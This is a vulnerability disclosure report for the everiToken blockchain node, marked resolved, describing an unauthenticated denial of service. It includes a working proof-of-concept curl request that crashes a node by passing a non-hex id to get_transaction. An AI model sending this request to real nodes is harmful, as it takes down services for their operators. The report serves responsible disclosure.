everiToken | everiToken | blockchain

DoS via get_transaction function

Creation date October 1, 2018

State: resolved
Severity: High ( 7.5 )
Visibility: visible
Vulnerability: DoS

everiToken’s node crashes when non-hex id value is passed in get_transaction function. As far as this API function is accessible remotely without any authorization - any evt node can be DoSed remotely.

And start the Everitoken node:

  • docker run --name evtd -p 8888:8888 -p 9876:9876 -t everitoken/evt evtd.sh --http-validate-host=false --charge-free-mode

Test the node with simply requesting versions:

  • curl localhost:8888/v1/chain/get_info

Request:

{"server_version":"b2674828","chain_id":"dae43118cc62801c4148c4143865be5bde49561fc61671516fc9183cdec91337", "evt_api_version":"3.1.2","head_block_num":1,"last_irreversible_block_num":0,"last_irreversible_block_id": "0000000000000000000000000000000000000000000000000000000000000000", "head_block_id":"000000019034e61532475fe9e396442127692fb3ddad3f971714213d5c0b2742","head_block_time":"2018-05-31T12:00:00","head_block_producer":"","recent_slots":"","participation_rate":0.00000000000000000}

To break the node node run:

curl -X POST --data '{"block_num": 12345, "id":"1" }' localhost:8888/v1/chain/get_transaction

The node is crashed with the next error:

minicore-dumping failed

See PoC video attached